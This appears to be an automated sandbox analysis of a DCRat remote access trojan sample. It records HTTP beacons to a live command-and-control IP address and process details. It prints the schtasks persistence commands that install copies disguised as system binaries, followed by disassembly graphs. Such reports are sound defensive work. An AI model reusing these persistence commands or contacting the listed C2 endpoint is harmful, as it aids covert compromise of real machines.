                      Dec 11, 2024 20:48:05.041300058 CET611OUTGET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1
                      Accept: */*
                      Content-Type: text/css
                      User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:48:06.374494076 CET749INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:48:06 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.44977778.24.221.196807584C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:48:08.216597080 CET611OUTGET /destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1 HTTP/1.1
                      Accept: */*
                      Content-Type: text/css
                      User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:48:09.555376053 CET749INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:48:09 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&itTTowDauiJX=2vqNo8HghvWEkE7ZnFR4WgxB7FN1
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.44982978.24.221.196801900C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:48:29.221960068 CET594OUTGET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1
                      Accept: */*
                      Content-Type: text/plain
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:48:30.543548107 CET739INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:48:30 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44983678.24.221.196801900C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:48:32.288752079 CET594OUTGET /destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I HTTP/1.1
                      Accept: */*
                      Content-Type: text/plain
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:48:33.608733892 CET739INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:48:33 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQdLfEUb8rsbvsDeT595d251=nZMh4UPVO0I
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:14:46:56
                      Start date:11/12/2024
                      Path:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\7fGdoA6Inq.exe"
                      Imagebase:0x380000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:14:47:01
                      Start date:11/12/2024
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:schtasks.exe /create /tn "QtLimbtNymPOHuXh" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe'" /rl HIGHEST /f
                      Imagebase:0x7ff76f990000
                      File size:235'008 bytes
                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:14:47:02
                      Start date:11/12/2024
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f
                      Imagebase:0x7ff76f990000
                      File size:235'008 bytes
                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:14:47:02
                      Start date:11/12/2024
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe'" /rl HIGHEST /f
                      Imagebase:0x7ff76f990000
                      File size:235'008 bytes
                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:14:47:02
                      Start date:11/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat"
                      Imagebase:0x7ff73ebd0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:14:47:02
                      Start date:11/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:14:47:02
                      Start date:11/12/2024
                      Path:C:\Windows\System32\w32tm.exe
                      Wow64 process (32bit):false
                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Imagebase:0x7ff697130000
                      File size:108'032 bytes
                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:7
                      Start time:14:47:03
                      Start date:11/12/2024
                      Path:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                      Imagebase:0x9a0000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 88%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:8
                      Start time:14:47:03
                      Start date:11/12/2024
                      Path:C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe
                      Imagebase:0x3c0000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 88%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:14:47:04
                      Start date:11/12/2024
                      Path:C:\PerfLogs\wininit.exe
                      Wow64 process (32bit):false
                      Commandline:C:\PerfLogs\wininit.exe
                      Imagebase:0xac0000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\PerfLogs\wininit.exe, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 88%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:10
                      Start time:14:47:07
                      Start date:11/12/2024
                      Path:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\7fGdoA6Inq.exe"
                      Imagebase:0xf00000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:12
                      Start time:14:47:12
                      Start date:11/12/2024
                      Path:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                      Imagebase:0x930000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:15
                      Start time:14:47:37
                      Start date:11/12/2024
                      Path:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                      Imagebase:0xe30000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:16
                      Start time:14:48:02
                      Start date:11/12/2024
                      Path:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                      Imagebase:0x160000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:18
                      Start time:14:48:26
                      Start date:11/12/2024
                      Path:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                      Imagebase:0xce0000
                      File size:2'781'721 bytes
                      MD5 hash:8B744166EECACE320158F4D0F704B13E
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:21.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 4723 7ffd9b8b0ae5 4725 7ffd9b8b0b3b QueryFullProcessImageNameA 4723->4725 4726 7ffd9b8b0ca4 4725->4726

                        Executed Functions

                        Function 00007FFD9B8A2010 Relevance: 15.3, Strings: 11, Instructions: 1544COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 7ffd9b8a2010-7ffd9b8a2066 4 7ffd9b8a2457-7ffd9b8a247b 0->4 5 7ffd9b8a206c-7ffd9b8a2092 0->5 8 7ffd9b8a247d-7ffd9b8a24de 4->8 9 7ffd9b8a24e3-7ffd9b8a2543 4->9 10 7ffd9b8a20a9-7ffd9b8a20f8 5->10 11 7ffd9b8a2094-7ffd9b8a20a4 5->11 13 7ffd9b8a348d-7ffd9b8a349b 8->13 24 7ffd9b8a2545-7ffd9b8a25a9 9->24 25 7ffd9b8a25ae-7ffd9b8a262c 9->25 21 7ffd9b8a23ea-7ffd9b8a241f 10->21 11->13 26 7ffd9b8a2425-7ffd9b8a2452 21->26 27 7ffd9b8a20fd-7ffd9b8a211c 21->27 24->13 45 7ffd9b8a263e-7ffd9b8a266c 25->45 46 7ffd9b8a262e-7ffd9b8a2639 25->46 26->13 33 7ffd9b8a2156-7ffd9b8a2158 27->33 34 7ffd9b8a211e-7ffd9b8a2154 27->34 37 7ffd9b8a215e-7ffd9b8a216e 33->37 34->37 39 7ffd9b8a23a0-7ffd9b8a23e1 37->39 40 7ffd9b8a2174-7ffd9b8a2207 37->40 50 7ffd9b8a23e2-7ffd9b8a23e7 39->50 63 7ffd9b8a22a5-7ffd9b8a22c5 40->63 64 7ffd9b8a220d-7ffd9b8a22a0 40->64 52 7ffd9b8a2672-7ffd9b8a269d 45->52 53 7ffd9b8a2723-7ffd9b8a2747 45->53 46->13 50->21 57 7ffd9b8a26f6-7ffd9b8a271e 52->57 58 7ffd9b8a269f-7ffd9b8a26f3 52->58 59 7ffd9b8a274d-7ffd9b8a2794 53->59 60 7ffd9b8a2974-7ffd9b8a2999 53->60 57->13 58->57 77 7ffd9b8a27e6 59->77 78 7ffd9b8a2796-7ffd9b8a27e4 59->78 68 7ffd9b8a2a0a-7ffd9b8a2a22 60->68 69 7ffd9b8a299b-7ffd9b8a29c0 60->69 75 7ffd9b8a22c7-7ffd9b8a22fe 63->75 76 7ffd9b8a2300-7ffd9b8a2302 63->76 64->50 80 7ffd9b8a2a28-7ffd9b8a2a52 68->80 81 7ffd9b8a2d6c-7ffd9b8a2d91 68->81 69->68 82 7ffd9b8a2308-7ffd9b8a2318 75->82 76->82 85 7ffd9b8a27f0-7ffd9b8a2800 77->85 78->85 94 7ffd9b8a2a59-7ffd9b8a2a83 80->94 95 7ffd9b8a2a54 80->95 96 7ffd9b8a2e02-7ffd9b8a2e04 81->96 97 7ffd9b8a2d93-7ffd9b8a2e00 81->97 89 7ffd9b8a231e-7ffd9b8a2373 82->89 90 7ffd9b8a239f 82->90 91 7ffd9b8a2802-7ffd9b8a280c 85->91 92 7ffd9b8a2811-7ffd9b8a287e call 7ffd9b8a05f0 85->92 117 7ffd9b8a2375-7ffd9b8a239c 89->117 118 7ffd9b8a239e 89->118 90->39 91->13 128 7ffd9b8a28f0-7ffd9b8a2926 92->128 111 7ffd9b8a2ad5 94->111 112 7ffd9b8a2a85-7ffd9b8a2ad3 94->112 95->94 100 7ffd9b8a2e0a-7ffd9b8a2e20 96->100 97->100 104 7ffd9b8a2e26-7ffd9b8a2e5f 100->104 105 7ffd9b8a333f-7ffd9b8a33a5 100->105 122 7ffd9b8a2e66-7ffd9b8a2e85 104->122 123 7ffd9b8a2e61 104->123 139 7ffd9b8a33a7-7ffd9b8a33ac call 7ffd9b8a0600 105->139 140 7ffd9b8a33cc-7ffd9b8a33e9 105->140 116 7ffd9b8a2adf-7ffd9b8a2aef 111->116 112->116 125 7ffd9b8a2b00-7ffd9b8a2c60 call 7ffd9b8a05f0 116->125 126 7ffd9b8a2af1-7ffd9b8a2afb 116->126 117->50 118->90 129 7ffd9b8a2e87 122->129 130 7ffd9b8a2e8c-7ffd9b8a2f05 122->130 123->122 196 7ffd9b8a2ce2-7ffd9b8a2d1e 125->196 126->13 144 7ffd9b8a292c-7ffd9b8a296f 128->144 145 7ffd9b8a2880-7ffd9b8a28ed call 7ffd9b8a05f8 128->145 129->130 158 7ffd9b8a2f16-7ffd9b8a2f33 130->158 159 7ffd9b8a2f07-7ffd9b8a2f11 130->159 147 7ffd9b8a33b1-7ffd9b8a33c7 139->147 152 7ffd9b8a343b-7ffd9b8a343d 140->152 153 7ffd9b8a33eb-7ffd9b8a3439 140->153 144->13 145->128 147->13 156 7ffd9b8a3443-7ffd9b8a3459 152->156 153->156 160 7ffd9b8a345b-7ffd9b8a347f call 7ffd9b8a0610 156->160 161 7ffd9b8a3481-7ffd9b8a348b 156->161 169 7ffd9b8a2f85 158->169 170 7ffd9b8a2f35-7ffd9b8a2f83 158->170 159->13 160->13 161->13 174 7ffd9b8a2f8f-7ffd9b8a2fa5 169->174 170->174 177 7ffd9b8a2fb6-7ffd9b8a2fba call 7ffd9b8a05f0 174->177 178 7ffd9b8a2fa7-7ffd9b8a2fb1 174->178 182 7ffd9b8a2fbf-7ffd9b8a3017 177->182 178->13 185 7ffd9b8a3028-7ffd9b8a317c 182->185 186 7ffd9b8a3019-7ffd9b8a3023 182->186 216 7ffd9b8a32e6-7ffd9b8a3325 185->216 186->13 200 7ffd9b8a2c65-7ffd9b8a2cdf call 7ffd9b8a05f8 196->200 201 7ffd9b8a2d24-7ffd9b8a2d67 196->201 200->196 201->13 218 7ffd9b8a332b-7ffd9b8a333a 216->218 219 7ffd9b8a3181-7ffd9b8a31cb 216->219 218->13 222 7ffd9b8a31cd-7ffd9b8a31ce 219->222 223 7ffd9b8a31d3-7ffd9b8a32d6 call 7ffd9b8a05f8 219->223 224 7ffd9b8a32d7-7ffd9b8a32e0 222->224 223->224 224->216
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 9bd6bf76561e8c8ac25e1d6152607dee1358d779d1d310a1b5241f5136dc400c
                        • Instruction ID: 4846439f7e0b4b2288c8745713953c7fddae3e355c0eb55334a34d2e744932b1
                        • Opcode Fuzzy Hash: 9bd6bf76561e8c8ac25e1d6152607dee1358d779d1d310a1b5241f5136dc400c
                        • Instruction Fuzzy Hash: 91D2C570E1962D8FDBA8DF58C894BA9B7B1FF59301F5041EAD00DE3295DA34AA81CF50
                        Function 00007FFD9B8A7BDD Relevance: .8, Instructions: 837COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000000.00000002.1737373202.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7ffd9b8a0000_7fGdoA6Inq.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22001977b29ca583955b76f1ab542ee4dfbf23732dfbaf3c883827ee09503834
                        • Instruction ID: 735131e30f11f26ba667c9ef1956ae62a1c1c28bf1d1aaf6d5c2c49bf4be08fa
                        • Opcode Fuzzy Hash: 22001977b29ca583955b76f1ab542ee4dfbf23732dfbaf3c883827ee09503834
                        • Instruction Fuzzy Hash: 89728570E1892C8FDBA4EF18C899BA8B7B1FB58305F5105E9900DE3265DA34AEC1CF45
                        Function 00007FFD9B8AFE82 Relevance: .5, Instructions: 457COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
